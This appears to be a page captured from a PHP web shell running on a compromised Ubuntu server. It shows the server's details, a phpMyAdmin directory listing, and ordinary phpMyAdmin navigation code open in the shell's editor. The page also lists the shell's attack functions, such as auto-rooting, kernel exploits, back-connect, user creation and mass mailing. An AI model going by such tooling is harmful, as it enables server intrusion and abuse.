Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
phpmyadmin /
libraries /
navigation /
nodes /
[ HOME SHELL ]
Name
Size
Permission
Action
Node.php
26.35
KB
-rw-r--r--
NodeColumn.php
1.38
KB
-rw-r--r--
NodeColumnContainer.php
1.85
KB
-rw-r--r--
NodeDatabase.php
24.16
KB
-rw-r--r--
NodeDatabaseChild.php
1.49
KB
-rw-r--r--
NodeDatabaseChildContainer.php
1.15
KB
-rw-r--r--
NodeDatabaseContainer.php
1.41
KB
-rw-r--r--
NodeEvent.php
1.48
KB
-rw-r--r--
NodeEventContainer.php
1.63
KB
-rw-r--r--
NodeFunction.php
1.57
KB
-rw-r--r--
NodeFunctionContainer.php
1.86
KB
-rw-r--r--
NodeIndex.php
1.28
KB
-rw-r--r--
NodeIndexContainer.php
1.85
KB
-rw-r--r--
NodeProcedure.php
1.61
KB
-rw-r--r--
NodeProcedureContainer.php
1.83
KB
-rw-r--r--
NodeTable.php
10.85
KB
-rw-r--r--
NodeTableContainer.php
1.75
KB
-rw-r--r--
NodeTrigger.php
1.29
KB
-rw-r--r--
NodeTriggerContainer.php
1.69
KB
-rw-r--r--
NodeView.php
1.46
KB
-rw-r--r--
NodeViewContainer.php
1.74
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : NodeDatabaseChild.php
<?php /* vim: set expandtab sw=4 ts=4 sts=4: */ /** * Functionality for the navigation tree * * @package PhpMyAdmin-Navigation */ namespace PMA\libraries\navigation\nodes; use PMA; /** * Represents a node that is a child of a database node * This may either be a concrete child such as table or a container * such as table container * * @package PhpMyAdmin-Navigation */ abstract class NodeDatabaseChild extends Node { /** * Returns the type of the item represented by the node. * * @return string type of the item */ protected abstract function getItemType(); /** * Returns HTML for control buttons displayed infront of a node * * @return String HTML for control buttons */ public function getHtmlForControlButtons() { $ret = ''; $cfgRelation = PMA_getRelationsParam(); if ($cfgRelation['navwork']) { $db = $this->realParent()->real_name; $item = $this->real_name; $ret = '<span class="navItemControls">' . '<a href="navigation.php' . PMA_URL_getCommon() . '&hideNavItem=true' . '&itemType=' . urlencode($this->getItemType()) . '&itemName=' . urlencode($item) . '&dbName=' . urlencode($db) . '"' . ' class="hideNavItem ajax">' . PMA\libraries\Util::getImage('lightbulb_off.png', __('Hide')) . '</a></span>'; } return $ret; } }
Close